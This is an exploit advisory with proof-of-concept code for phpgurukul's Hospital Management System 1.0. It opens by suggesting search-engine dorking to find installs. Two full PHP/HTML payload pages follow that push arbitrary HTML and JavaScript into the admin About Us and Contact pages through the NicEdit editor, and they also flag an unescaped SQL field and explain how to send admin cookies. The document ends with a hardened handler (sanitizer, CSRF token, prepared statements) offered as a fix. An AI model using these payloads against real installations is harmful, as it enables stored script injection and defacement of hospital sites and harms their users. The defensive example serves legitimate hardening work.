Hospital Management System 1.0 Code Injection

=============================================================================================================================================
| # Title : Hospital Management System 1.0 (WYSIWYG) Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip |
=============================================================================================================================================

PoC:

[+] Dorking in Google or another search engine to locate installs.

[+] Part 01 : about-us.php

[+] This payload stores HTML/JavaScript of your choice in the database through NicEdit, the WYSIWYG editor (v0.9 r25) loaded by /hms/admin/about-us.php. The handler reproduced at the top of the payload below takes the editor content as PageDescription and writes it to tblpage (PageType 'aboutus'); real_escape_string() only escapes it for SQL, so tags and <script> blocks are stored intact, and PageTitle is concatenated into the query without any escaping at all.

[+] Line 2 : include your own database connection here (it has to define $con).

[+] Line 44 : the fetch() call that sends the form data; set it to the target URL. Note that fetch() defaults to credentials: 'same-origin', so no cookie for the target is sent with the request; if the target handler insists on an admin session, log in there in the same browser and add credentials: 'include' to the call, which the target's CORS policy must also permit.

[+] Save the payload as poc.php under your local web root, open it in the browser, write the content in the editor and submit.

[+] payload :

<?php
include('http://127.0.0.1/hospital/hms/admin/include/config.php'); // Make sure to include your database connection here (it must define $con)

if (isset($_POST['submit'])) {
    $pagetitle = $_POST['pagetitle']; // placed in the query below without any escaping
    $pagedes = $con->real_escape_string($_POST['pagedes']); // SQL escaping only: HTML tags and <script> survive
    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");

    if ($query) {
        echo '<script>alert("About Us has been updated.")</script>';
    } else {
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';
    }
    exit;
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>indoushka | Update About Us Content</title>
    <!-- NicEdit Script -->
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
    <script type="text/javascript">
        // Apply NicEdit to all text areas when the DOM is loaded
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        // Function to handle form submission using JavaScript
        function submitForm(event) {
            event.preventDefault(); // Prevent default form submission

            const pagetitle = document.getElementById('pagetitle').value;
            const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content (raw HTML)

            // Prepare the form data to be sent
            const formData = new FormData();
            formData.append('pagetitle', pagetitle);
            formData.append('pagedes', pagedes);
            formData.append('submit', true);

            // Send the form data using fetch API (cross-origin POST; no target cookies are sent by default)
            fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', {
                method: 'POST',
                body: formData,
            })
            .then(response => response.text())
            .then(data => {
                alert('About Us content has been updated successfully.');
                console.log(data); // Handle the response from the server
            })
            .catch(error => {
                console.error('Error:', error);
            });
        }
    </script>
    <style>
        /* Center the form container */
        .editor-container {
            max-width: 800px;
            margin: 0 auto; /* Center horizontally */
            padding: 20px;
            text-align: center; /* Center the content inside */
        }

        /* Ensure the textarea takes the full width */
        #pagedes {
            width: 100%;
            height: 300px;
            margin: 0 auto;
        }
    </style>
</head>
<body>
    <div id="app">
        <div class="app-content">
            <div class="main-content">
                <div class="wrap-content container" id="container">
                    <!-- Page Title Section -->
                    <section id="page-title">
                        <div class="row">
                            <div class="col-sm-8">
                                <h1 class="mainTitle">Update the About Us Content</h1>
                            </div>
                            <ol class="breadcrumb">
                                <li class="active">
                                    <span>Update About Us Content</span>
                                </li>
                            </ol>
                        </div>
                    </section>
                    <!-- Form Section -->
                    <div class="container-fluid container-fullw bg-white">
                        <div class="row">
                            <div class="col-md-12">
                                <!-- Centering the form using a wrapper div -->
                                <div class="editor-container">
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">
                                        <div class="form-group">
                                            <label for="pagetitle">Page Title</label>
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>
                                        </div>
                                        <div class="form-group">
                                            <label for="pagedes">Page Description</label>
                                            <!-- NicEdit will enhance this textarea -->
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>
                                        </div>
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>
                                    </form>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!-- End Form Section -->
                </div>
            </div>
        </div>
    </div>
    <!-- Footer -->
</body>
</html>

-------------------- [+] Part 02 : contact.php [+] --------------------

[+] Line 4 : the URL of your database connection file. file_get_contents() only returns its output as text, so $con still has to be defined, for example with the include() used in Part 01.

[+] Line 60 : the fetch() call that sends the form data; set it to the target URL (same credentials caveat as in Part 01).

[+] Save the payload as poc.php under your local web root, open it in the browser and submit the form.

[+] payload :

<?php

// Address of the external server (the target's config.php)
$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php';

// Fetch the data from the external server (this only returns its output as text; $con must still be defined by your own connection include, as in Part 01)
$response = file_get_contents($url);

// Check that data was received
if ($response !== FALSE) {
    // Handle the data
    echo $response;
} else {
    echo 'An error occurred while fetching the data.';
}

if (isset($_POST['submit'])) {
    $pagetitle = $_POST['pagetitle']; // placed in the query below without any escaping
    $pagedes = $con->real_escape_string($_POST['pagedes']); // SQL escaping only: HTML tags and <script> survive
    $email = $con->real_escape_string($_POST['email']);
    $mobnum = $con->real_escape_string($_POST['mobnum']);

    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'");

    if ($query) {
        echo '<script>alert("Contact Us has been updated.")</script>';
    } else {
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';
    }
    exit;
}

?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Admin | Update Contact Us Content</title>
    <!-- NicEdit Script -->
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
    <script type="text/javascript">
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        function submitForm(event) {
            event.preventDefault();

            const pagetitle = document.getElementById('pagetitle').value;
            const pagedes = nicEditors.findEditor('pagedes').getContent(); // raw HTML from the editor
            const email = document.getElementById('email').value;
            const mobnum = document.getElementById('mobnum').value;

            const formData = new FormData();
            formData.append('pagetitle', pagetitle);
            formData.append('pagedes', pagedes);
            formData.append('email', email);
            formData.append('mobnum', mobnum);
            formData.append('submit', true);

            fetch('http://127.0.0.1/hospital/hms/admin/contact.php', { // cross-origin POST; no target cookies are sent by default
                method: 'POST',
                body: formData,
            })
            .then(response => response.text())
            .then(data => {
                alert('Contact Us content has been updated successfully.');
                console.log(data);
            })
            .catch(error => {
                console.error('Error:', error);
            });
        }
    </script>
    <style>
        .editor-container {
            max-width: 800px;
            margin: 0 auto;
            padding: 20px;
            text-align: center;
        }

        #pagedes {
            width: 100%;
            height: 300px;
            margin: 0 auto;
        }
    </style>
</head>
<body>
    <div id="app">
        <div class="app-content">
            <div class="main-content">
                <div class="wrap-content container" id="container">
                    <section id="page-title">
                        <div class="row">
                            <div class="col-sm-8">
                                <h1 class="mainTitle">Admin | Update Contact Us Content</h1>
                            </div>
                            <ol class="breadcrumb">
                                <li class="active">
                                    <span>Update Contact Us Content</span>
                                </li>
                            </ol>
                        </div>
                    </section>
                    <div class="container-fluid container-fullw bg-white">
                        <div class="row">
                            <div class="col-md-12">
                                <div class="editor-container">
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">
                                        <div class="form-group">
                                            <label for="pagetitle">Page Title</label>
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>
                                        </div>
                                        <div class="form-group">
                                            <label for="pagedes">Page Description</label>
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>
                                        </div>
                                        <div class="form-group">
                                            <label for="email">Email</label>
                                            <input id="email" name="email" type="email" class="form-control" required>
                                        </div>
                                        <div class="form-group">
                                            <label for="mobnum">Mobile Number</label>
                                            <input id="mobnum" name="mobnum" type="text" class="form-control" required>
                                        </div>
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>
                                    </form>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</body>
</html>
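The handler pattern reproduced at the top of both payloads above (read $_POST, real_escape_string() the description, concatenate the title, UPDATE tblpage) is the part a fix has to change. The following is an added example written for this page; it is not code from phpgurukul's about-us.php or contact.php and not part of the PoC. It performs the same update with the controls the PoC relies on being absent: an admin session check, a per-session CSRF token so a page on another origin such as poc.php cannot drive the update, a prepared statement instead of string concatenation, and an allowlist sanitizer applied to the NicEdit HTML before it is stored. The $_SESSION['id'] key, the include path and the allowed tag list are assumptions, not taken from the vendor code.

```php
<?php
// Added example for this page (not phpgurukul's about-us.php/contact.php and
// not the PoC): a hardened version of the tblpage update handler.
// Assumptions, not taken from the vendor code: the admin login stores
// $_SESSION['id'], include/config.php defines $con (mysqli), and the public
// pages echo PageDescription as raw HTML.

// Tags and attributes NicEdit legitimately produces; anything else is dropped,
// including <script>, <img onerror=...>, <iframe>, inline event handlers and
// javascript: links.
const ALLOWED_TAGS  = ['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'ul', 'ol', 'li', 'a', 'h2', 'h3'];
const ALLOWED_ATTRS = ['a' => ['href']];

function sanitize_html(string $html): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);                     // editors emit sloppy HTML; do not abort on it
    $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>');
    libxml_clear_errors();
    // item(0) is the wrapper we added: it comes first in document order, and
    // anything that "escapes" it (a stray </div> in the input) is never serialised.
    $root = $doc->getElementsByTagName('div')->item(0);
    scrub($root);
    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

function scrub(DOMNode $node): void
{
    // Iterate over a static copy: removing children mutates the live NodeList.
    foreach (iterator_to_array($node->childNodes, false) as $child) {
        if ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if (!in_array($tag, ALLOWED_TAGS, true)) {
                $node->removeChild($child);               // drops the whole subtree, e.g. a <script> body
                continue;
            }
            foreach (iterator_to_array($child->attributes, false) as $attr) {
                $name = strtolower($attr->name);
                $keep = in_array($name, ALLOWED_ATTRS[$tag] ?? [], true)
                    && ($name !== 'href' || preg_match('#^https?://#i', trim($attr->value)));
                if (!$keep) {
                    $child->removeAttribute($attr->name);
                }
            }
            scrub($child);
        } elseif ($child->nodeType !== XML_TEXT_NODE) {
            $node->removeChild($child);                   // comments, processing instructions, etc.
        }
    }
}

// Bound parameters instead of string concatenation: the PoC handler drops
// PageTitle into the SQL string with no escaping at all.
function update_page(mysqli $con, string $type, string $title, string $html): bool
{
    $stmt = $con->prepare('UPDATE tblpage SET PageTitle = ?, PageDescription = ? WHERE PageType = ?');
    $stmt->bind_param('sss', $title, $html, $type);
    return $stmt->execute();
}

// Web entry point: authenticate first, then require a per-session CSRF token
// so a page on another origin (such as poc.php) cannot drive the update.
function handle_request(mysqli $con, string $type): void
{
    session_start();
    if (empty($_SESSION['id'])) {                         // assumed key set by the admin login
        http_response_code(403);
        exit('Login required');
    }
    $_SESSION['csrf'] ??= bin2hex(random_bytes(32));      // the admin form must echo this back in a hidden field
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {
        if (!hash_equals($_SESSION['csrf'], (string) ($_POST['csrf'] ?? ''))) {
            http_response_code(403);
            exit('Bad CSRF token');
        }
        $title = trim((string) ($_POST['pagetitle'] ?? ''));
        $html  = sanitize_html((string) ($_POST['pagedes'] ?? ''));
        echo update_page($con, $type, $title, $html) ? 'Page updated.' : 'Something went wrong.';
    }
}

if (PHP_SAPI === 'cli') {
    // Constructed payload of the kind poc.php submits through NicEdit; only the
    // paragraph, a stripped <a>x</a> and the https link survive the sanitizer.
    $payload = '<p>Welcome</p><script>alert(1)</script>'
        . '<img src=x onerror="alert(2)"><a href="javascript:alert(3)">x</a>'
        . '<a href="https://example.org/">ok</a>';
    echo sanitize_html($payload), PHP_EOL;
} else {
    include 'include/config.php';                         // assumed to define $con
    handle_request($con, 'aboutus');                      // 'contactus' for the contact.php variant
}
```

Run the file with the PHP CLI to watch the sanitizer strip the constructed payload (the <script> block, the onerror handler and the javascript: link go, the paragraph and the https link stay); under a web server the same file acts as the POST handler. Sanitizing on write is defence in depth only: the public pages should still escape or sanitize on output, because rows the PoC has already stored are not cleaned retroactively.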

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
